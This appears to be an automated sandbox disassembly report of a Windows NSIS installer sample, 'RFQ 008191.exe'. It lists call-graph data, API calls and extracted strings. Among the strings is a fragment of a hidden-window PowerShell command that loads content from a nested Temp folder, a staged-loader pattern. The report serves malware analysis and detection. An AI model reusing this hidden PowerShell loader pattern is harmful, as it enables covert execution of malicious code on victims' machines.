4556 401bac wsprintfW 4555->4556 4557 402c4f 4556->4557 4558 40149e 4559 4023c2 4558->4559 4560 4014ac PostQuitMessage 4558->4560 4560->4559 4561 4016a0 4562 402dcb 21 API calls 4561->4562 4563 4016a7 4562->4563 4564 402dcb 21 API calls 4563->4564 4565 4016b0 4564->4565 4566 402dcb 21 API calls 4565->4566 4567 4016b9 MoveFileW 4566->4567 4568 4016cc 4567->4568 4574 4016c5 4567->4574 4569 40231b 4568->4569 4570 40689e 2 API calls 4568->4570 4572 4016db 4570->4572 4571 401423 28 API calls 4571->4569 4572->4569 4573 406301 40 API calls 4572->4573 4573->4574 4574->4571 4575 401a24 4576 402dcb 21 API calls 4575->4576 4577 401a2b 4576->4577 4578 402dcb 21 API calls 4577->4578 4579 401a34 4578->4579 4580 401a3b lstrcmpiW 4579->4580 4581 401a4d lstrcmpW 4579->4581 4582 401a41 4580->4582 4581->4582 4583 402324 4584 402dcb 21 API calls 4583->4584 4585 40232a 4584->4585 4586 402dcb 21 API calls 4585->4586 4587 402333 4586->4587 4588 402dcb 21 API calls 4587->4588 4589 40233c 4588->4589 4590 40689e 2 API calls 4589->4590 4591 402345 4590->4591 4592 402356 lstrlenW lstrlenW 4591->4592 4593 402349 4591->4593 4595 4055c6 28 API calls 4592->4595 4594 4055c6 28 API calls 4593->4594 4596 402351 4593->4596 4594->4596 4597 402394 SHFileOperationW 4595->4597 4597->4593 4597->4596 4598 401da6 4599 401db9 GetDlgItem 4598->4599 4600 401dac 4598->4600 4602 401db3 4599->4602 4601 402da9 21 API calls 4600->4601 4601->4602 4603 401dfa GetClientRect LoadImageW SendMessageW 4602->4603 4604 402dcb 21 API calls 4602->4604 4606 401e58 4603->4606 4608 401e64 4603->4608 4604->4603 4607 401e5d DeleteObject 4606->4607 4606->4608 4607->4608 4609 4023a8 4610 4023af 4609->4610 4612 4023c2 4609->4612 4611 40657e 21 API calls 4610->4611 4613 4023bc 4611->4613 4614 405ba1 MessageBoxIndirectW 4613->4614 4614->4612 4615 402c2a SendMessageW 4616 402c44 InvalidateRect 4615->4616 4617 402c4f 4615->4617 4616->4617 4625 404f2d GetDlgItem GetDlgItem 4626 4051a4 4625->4626 4627 404f7f 7 API calls 4625->4627 4631 405286 4626->4631 4659 405213 4626->4659 4679 404e7b SendMessageW 4626->4679 4628 405026 DeleteObject 4627->4628 4629 405019 SendMessageW 4627->4629 4630 40502f 4628->4630 4629->4628 4632 405066 4630->4632 4633 40657e 21 API calls 4630->4633 4635 405332 4631->4635 4640 405197 4631->4640 4645 4052df SendMessageW 4631->4645 4634 4044c0 22 API calls 4632->4634 4638 405048 SendMessageW SendMessageW 4633->4638 4639 40507a 4634->4639 4636 405344 4635->4636 4637 40533c SendMessageW 4635->4637 4647 405356 ImageList_Destroy 4636->4647 4648 40535d 4636->4648 4656 40536d 4636->4656 4637->4636 4638->4630 4644 4044c0 22 API calls 4639->4644 4642 404527 8 API calls 4640->4642 4641 405278 SendMessageW 4641->4631 4646 405533 4642->4646 4660 40508b 4644->4660 4645->4640 4650 4052f4 SendMessageW 4645->4650 4647->4648 4651 405366 GlobalFree 4648->4651 4648->4656 4649 4054e7 4649->4640 4654 4054f9 ShowWindow GetDlgItem ShowWindow 4649->4654 4653 405307 4650->4653 4651->4656 4652 405166 GetWindowLongW SetWindowLongW 4655 40517f 4652->4655 4662 405318 SendMessageW 4653->4662 4654->4640 4657 405184 ShowWindow 4655->4657 4658 40519c 4655->4658 4656->4649 4672 4053a8 4656->4672 4684 404efb 4656->4684 4677 4044f5 SendMessageW 4657->4677 4678 4044f5 SendMessageW 4658->4678 4659->4631 4659->4641 4660->4652 4661 4050de SendMessageW 4660->4661 4663 405161 4660->4663 4666 405130 SendMessageW 4660->4666 4667 40511c SendMessageW 4660->4667 4661->4660 4662->4635 4663->4652 4663->4655 4666->4660 4667->4660 4669 4054b2 4670 4054bd InvalidateRect 4669->4670 4673 4054c9 4669->4673 4670->4673 4671 4053d6 SendMessageW 4676 4053ec 4671->4676 4672->4671 4672->4676 4673->4649 4693 404e36 4673->4693 4675 405460 SendMessageW SendMessageW 4675->4676 4676->4669 4676->4675 4677->4640 4678->4626 4680 404eda SendMessageW 4679->4680 4681 404e9e GetMessagePos ScreenToClient SendMessageW 4679->4681 4682 404ed2 4680->4682 4681->4682 4683 404ed7 4681->4683 4682->4659 4683->4680 4696 406541 lstrcpynW 4684->4696 4686 404f0e 4697 406488 wsprintfW 4686->4697 4688 404f18 4689 40140b 2 API calls 4688->4689 4690 404f21 4689->4690 4698 406541 lstrcpynW 4690->4698 4692 404f28 4692->4672 4699 404d6d 4693->4699 4695 404e4b 4695->4649 4696->4686 4697->4688 4698->4692 4702 404d86 4699->4702 4700 40657e 21 API calls 4701 404dea 4700->4701 4703 40657e 21 API calls 4701->4703 4702->4700 4704 404df5 4703->4704 4705 40657e 21 API calls 4704->4705 4706 404e0b lstrlenW wsprintfW SetDlgItemTextW 4705->4706 4706->4695 4002 4024af 4003 402dcb 21 API calls 4002->4003 4004 4024c1 4003->4004 4005 402dcb 21 API calls 4004->4005 4006 4024cb 4005->4006 4019 402e5b 4006->4019 4009 402953 4010 402503 4012 40250f 4010->4012 4014 402da9 21 API calls 4010->4014 4011 402dcb 21 API calls 4013 4024f9 lstrlenW 4011->4013 4015 40252e RegSetValueExW 4012->4015 4016 4032d9 39 API calls 4012->4016 4013->4010 4014->4012 4017 402544 RegCloseKey 4015->4017 4016->4015 4017->4009 4020 402e76 4019->4020 4023 4063dc 4020->4023 4024 4063eb 4023->4024 4025 4024db 4024->4025 4026 4063f6 RegCreateKeyExW 4024->4026 4025->4009 4025->4010 4025->4011 4026->4025 4707 404630 lstrlenW 4708 404651 WideCharToMultiByte 4707->4708 4709 40464f 4707->4709 4709->4708 4710 402930 4711 402dcb 21 API calls 4710->4711 4712 402937 FindFirstFileW 4711->4712 4713 40295f 4712->4713 4717 40294a 4712->4717 4714 402968 4713->4714 4718 406488 wsprintfW 4713->4718 4719 406541 lstrcpynW 4714->4719 4718->4714 4719->4717 4720 401931 4721 401968 4720->4721 4722 402dcb 21 API calls 4721->4722 4723 40196d 4722->4723 4724 405c4d 71 API calls 4723->4724 4725 401976 4724->4725 4726 4049b1 4727 4049dd 4726->4727 4728 4049ee 4726->4728 4787 405b85 GetDlgItemTextW 4727->4787 4730 4049fa GetDlgItem 4728->4730 4736 404a59 4728->4736 4733 404a0e 4730->4733 4731 404b3d 4735 404cec 4731->4735 4789 405b85 GetDlgItemTextW 4731->4789 4732 4049e8 4734 4067ef 5 API calls 4732->4734 4738 404a22 SetWindowTextW 4733->4738 4739 405ebb 4 API calls 4733->4739 4734->4728 4743 404527 8 API calls 4735->4743 4736->4731 4736->4735 4740 40657e 21 API calls 4736->4740 4742 4044c0 22 API calls 4738->4742 4744 404a18 4739->4744 4745 404acd SHBrowseForFolderW 4740->4745 4741 404b6d 4746 405f18 18 API calls 4741->4746 4747 404a3e 4742->4747 4748 404d00 4743->4748 4744->4738 4752 405e10 3 API calls 4744->4752 4745->4731 4749 404ae5 CoTaskMemFree 4745->4749 4750 404b73 4746->4750 4751 4044c0 22 API calls 4747->4751 4753 405e10 3 API calls 4749->4753 4790 406541 lstrcpynW 4750->4790 4754 404a4c 4751->4754 4752->4738 4755 404af2 4753->4755 4788 4044f5 SendMessageW 4754->4788 4758 404b29 SetDlgItemTextW 4755->4758 4763 40657e 21 API calls 4755->4763 4758->4731 4759 404a52 4761 406935 5 API calls 4759->4761 4760 404b8a 4762 406935 5 API calls 4760->4762 4761->4736 4769 404b91 4762->4769 4764 404b11 lstrcmpiW 4763->4764 4764->4758 4767 404b22 lstrcatW 4764->4767 4765 404bd2 4791 406541 lstrcpynW 4765->4791 4767->4758 4768 404bd9 4770 405ebb 4 API calls 4768->4770 4769->4765 4773 405e5c 2 API calls 4769->4773 4775 404c2a 4769->4775 4771 404bdf GetDiskFreeSpaceW 4770->4771 4774 404c03 MulDiv 4771->4774 4771->4775 4773->4769 4774->4775 4776 404c9b 4775->4776 4778 404e36 24 API calls 4775->4778 4777 404cbe 4776->4777 4779 40140b 2 API calls 4776->4779 4792 4044e2 KiUserCallbackDispatcher 4777->4792 4780 404c88 4778->4780 4779->4777 4782 404c9d SetDlgItemTextW 4780->4782 4783 404c8d 4780->4783 4782->4776 4785 404d6d 24 API calls 4783->4785 4784 404cda 4784->4735 4786 40490a SendMessageW 4784->4786 4785->4776 4786->4735 4787->4732 4788->4759 4789->4741 4790->4760 4791->4768 4792->4784 4793 401934 4794 402dcb 21 API calls 4793->4794 4795 40193b 4794->4795 4796 405ba1 MessageBoxIndirectW 4795->4796 4797 401944 4796->4797 4798 4028b6 4799 4028bd 4798->4799 4801 402bce 4798->4801 4800 402da9 21 API calls 4799->4800 4802 4028c4 4800->4802 4803 4028d3 SetFilePointer 4802->4803 4803->4801 4804 4028e3 4803->4804 4806 406488 wsprintfW 4804->4806 4806->4801 4807 401f37 4808 402dcb 21 API calls 4807->4808 4809 401f3d 4808->4809 4810 402dcb 21 API calls 4809->4810 4811 401f46 4810->4811 4812 402dcb 21 API calls 4811->4812 4813 401f4f 4812->4813 4814 402dcb 21 API calls 4813->4814 4815 401f58 4814->4815 4816 401423 28 API calls 4815->4816 4817 401f5f 4816->4817 4824 405b67 ShellExecuteExW 4817->4824 4819 401fa7 4820 402953 4819->4820 4821 4069e0 5 API calls 4819->4821 4822 401fc4 CloseHandle 4821->4822 4822->4820 4824->4819 4825 402fb8 4826 402fe3 4825->4826 4827 402fca SetTimer 4825->4827 4828 403038 4826->4828 4829 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4826->4829 4827->4826 4829->4828 4830 4014b8 4831 4014be 4830->4831 4832 401389 2 API calls 4831->4832 4833 4014c6 4832->4833 4834 40553a 4835 40554a 4834->4835 4836 40555e 4834->4836 4838 405550 4835->4838 4839 4055a7 4835->4839 4837 405566 IsWindowVisible 4836->4837 4845 40557d 4836->4845 4837->4839 4841 405573 4837->4841 4840 40450c SendMessageW 4838->4840 4842 4055ac CallWindowProcW 4839->4842 4843 40555a 4840->4843 4844 404e7b 5 API calls 4841->4844 4842->4843 4844->4845 4845->4842 4846 404efb 4 API calls 4845->4846 4846->4839 4847 401d3c 4848 402da9 21 API calls 4847->4848 4849 401d42 IsWindow 4848->4849 4850 401a45 4849->4850

                                                                    Executed Functions

                                                                    Function 0040351C Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464stringfilecomCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 40351c-40356e SetErrorMode GetVersionExW 1 403570-4035a0 GetVersionExW 0->1 2 4035a8-4035ad 0->2 1->2 3 4035b5-4035f7 2->3 4 4035af 2->4 5 4035f9-403601 call 406935 3->5 6 40360a 3->6 4->3 5->6 12 403603 5->12 7 40360f-403623 call 4068c5 lstrlenA 6->7 13 403625-403641 call 406935 * 3 7->13 12->6 20 403652-4036b6 #17 OleInitialize SHGetFileInfoW call 406541 GetCommandLineW call 406541 13->20 21 403643-403649 13->21 28 4036b8-4036ba 20->28 29 4036bf-4036d3 call 405e3d CharNextW 20->29 21->20 26 40364b 21->26 26->20 28->29 32 4037ce-4037d4 29->32 33 4036d8-4036de 32->33 34 4037da 32->34 35 4036e0-4036e5 33->35 36 4036e7-4036ee 33->36 37 4037ee-403808 GetTempPathW call 4034eb 34->37 35->35 35->36 39 4036f0-4036f5 36->39 40 4036f6-4036fa 36->40 44 403860-40387a DeleteFileW call 4030a2 37->44 45 40380a-403828 GetWindowsDirectoryW lstrcatW call 4034eb 37->45 39->40 42 403700-403706 40->42 43 4037bb-4037ca call 405e3d 40->43 47 403720-403759 42->47 48 403708-40370f 42->48 43->32 61 4037cc-4037cd 43->61 66 403880-403886 44->66 67 403a67-403a77 call 403b39 OleUninitialize 44->67 45->44 64 40382a-40385a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034eb 45->64 49 403776-4037b0 47->49 50 40375b-403760 47->50 54 403711-403714 48->54 55 403716 48->55 58 4037b2-4037b6 49->58 59 4037b8-4037ba 49->59 50->49 56 403762-40376a 50->56 54->47 54->55 55->47 62 403771 56->62 63 40376c-40376f 56->63 58->59 65 4037dc-4037e9 call 406541 58->65 59->43 61->32 62->49 63->49 63->62 64->44 64->67 65->37 70 40388c-403897 call 405e3d 66->70 71 40391f-403926 call 403c13 66->71 78 403a79-403a89 call 405ba1 ExitProcess 67->78 79 403a9d-403aa3 67->79 81 4038e5-4038ef 70->81 82 403899-4038ce 70->82 77 40392b-40392f 71->77 77->67 83 403b21-403b29 79->83 84 403aa5-403abb GetCurrentProcess OpenProcessToken 79->84 89 4038f1-4038ff call 405f18 81->89 90 403934-40395a call 405b0c lstrlenW call 406541 81->90 86 4038d0-4038d4 82->86 91 403b2b 83->91 92 403b2f-403b33 ExitProcess 83->92 87 403af1-403aff call 406935 84->87 88 403abd-403aeb LookupPrivilegeValueW AdjustTokenPrivileges 84->88 94 4038d6-4038db 86->94 95 4038dd-4038e1 86->95 104 403b01-403b0b 87->104 105 403b0d-403b18 ExitWindowsEx 87->105 88->87 89->67 106 403905-40391b call 406541 * 2 89->106 110 40396b-403983 90->110 111 40395c-403966 call 406541 90->111 91->92 94->95 99 4038e3 94->99 95->86 95->99 99->81 104->105 108 403b1a-403b1c call 40140b 104->108 105->83 105->108 106->71 108->83 116 403988-40398c 110->116 111->110 118 403991-4039bb wsprintfW call 40657e 116->118 122 4039c4 call 405aef 118->122 123 4039bd-4039c2 call 405a95 118->123 126 4039c9-4039cb 122->126 123->126 128 403a07-403a26 SetCurrentDirectoryW call 406301 CopyFileW 126->128 129 4039cd-4039d7 GetFileAttributesW 126->129 137 403a65 128->137 138 403a28-403a49 call 406301 call 40657e call 405b24 128->138 130 4039f8-403a03 129->130 131 4039d9-4039e2 DeleteFileW 129->131 130->116 134 403a05 130->134 131->130 133 4039e4-4039f6 call 405c4d 131->133 133->118 133->130 134->67 137->67 146 403a4b-403a55 138->146 147 403a8f-403a9b CloseHandle 138->147 146->137 148 403a57-403a5f call 40689e 146->148 147->137 148->118 148->137
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE ref: 0040353F
                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
                                                                    • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
                                                                    • OleInitialize.OLE32(00000000), ref: 0040365A
                                                                    • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
                                                                    • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\RFQ 008191.exe",00000020,"C:\Users\user\Desktop\RFQ 008191.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036C7
                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                    • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
                                                                    • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
                                                                    • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
                                                                    • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E
                                                                      • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                    • wsprintfW.USER32 ref: 0040399B
                                                                    • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user~1\AppData\Local\Temp\), ref: 004039CE
                                                                    • DeleteFileW.KERNEL32(0042C800), ref: 004039DA
                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 00403A08
                                                                      • Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B
                                                                    • CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00403A1E
                                                                      • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                      • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                      • Part of subcall function 0040689E: FindFirstFileW.KERNELBASE(771B3420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C6D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 004068A9
                                                                      • Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5
                                                                    • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
                                                                    • ExitProcess.KERNEL32 ref: 00403A89
                                                                    • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
                                                                    • ExitProcess.KERNEL32 ref: 00403B33
                                                                      • Part of subcall function 00405AEF: CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                    • String ID: "C:\Users\user\Desktop\RFQ 008191.exe"$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$~nsu%X.tmp
                                                                    • API String ID: 1813718867-2592931743
                                                                    • Opcode ID: 9f65d0021fa33c3354d42538bbc8dc08c63897f5b3407e021a3db38cc4d3dfe0
                                                                    • Instruction ID: b6c3ecddbcec298392be70143bc2b9781a35be0696dc4cb4866b7eddd329dddd
                                                                    • Opcode Fuzzy Hash: 9f65d0021fa33c3354d42538bbc8dc08c63897f5b3407e021a3db38cc4d3dfe0
                                                                    • Instruction Fuzzy Hash: A9F12370604311ABD720AF659D05B2B7EE8EF8570AF10483EF481B22D1DB7D9A45CB6E
                                                                    Function 00405705 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 151 405705-405720 152 405726-4057ed GetDlgItem * 3 call 4044f5 call 404e4e GetClientRect GetSystemMetrics SendMessageW * 2 151->152 153 4058af-4058b6 151->153 174 40580b-40580e 152->174 175 4057ef-405809 SendMessageW * 2 152->175 155 4058e0-4058ed 153->155 156 4058b8-4058da GetDlgItem CreateThread CloseHandle 153->156 158 40590b-405915 155->158 159 4058ef-4058f5 155->159 156->155 163 405917-40591d 158->163 164 40596b-40596f 158->164 161 405930-405939 call 404527 159->161 162 4058f7-405906 ShowWindow * 2 call 4044f5 159->162 171 40593e-405942 161->171 162->158 169 405945-405955 ShowWindow 163->169 170 40591f-40592b call 404499 163->170 164->161 167 405971-405977 164->167 167->161 176 405979-40598c SendMessageW 167->176 172 405965-405966 call 404499 169->172 173 405957-405960 call 4055c6 169->173 170->161 172->164 173->172 180 405810-40581c SendMessageW 174->180 181 40581e-405835 call 4044c0 174->181 175->174 182 405992-4059bd CreatePopupMenu call 40657e AppendMenuW 176->182 183 405a8e-405a90 176->183 180->181 190 405837-40584b ShowWindow 181->190 191 40586b-40588c GetDlgItem SendMessageW 181->191 188 4059d2-4059e7 TrackPopupMenu 182->188 189 4059bf-4059cf GetWindowRect 182->189 183->171 188->183 193 4059ed-405a04 188->193 189->188 194 40585a 190->194 195 40584d-405858 ShowWindow 190->195 191->183 192 405892-4058aa SendMessageW * 2 191->192 192->183 196 405a09-405a24 SendMessageW 193->196 197 405860-405866 call 4044f5 194->197 195->197 196->196 198 405a26-405a49 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a4b-405a72 SendMessageW 198->200 200->200 201 405a74-405a88 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->183
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405763
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405772
                                                                    • GetClientRect.USER32(?,?), ref: 004057AF
                                                                    • GetSystemMetrics.USER32(00000002), ref: 004057B6
                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
                                                                    • ShowWindow.USER32(?,00000008), ref: 00405852
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405873
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405781
                                                                      • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004058C5
                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005699,00000000), ref: 004058D3
                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004058DA
                                                                    • ShowWindow.USER32(00000000), ref: 004058FE
                                                                    • ShowWindow.USER32(?,00000008), ref: 00405903
                                                                    • ShowWindow.USER32(00000008), ref: 0040594D
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
                                                                    • CreatePopupMenu.USER32 ref: 00405992
                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
                                                                    • GetWindowRect.USER32(?,?), ref: 004059C6
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
                                                                    • OpenClipboard.USER32(00000000), ref: 00405A27
                                                                    • EmptyClipboard.USER32 ref: 00405A2D
                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405A43
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405A77
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
                                                                    • CloseClipboard.USER32 ref: 00405A88
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                    • String ID: {
                                                                    • API String ID: 590372296-366298937
                                                                    • Opcode ID: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                    • Instruction ID: 1ec4b4c3d0988b91a44b02e8c0f1a80d5eff4bd371306251f5288e66bb296ab7
                                                                    • Opcode Fuzzy Hash: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
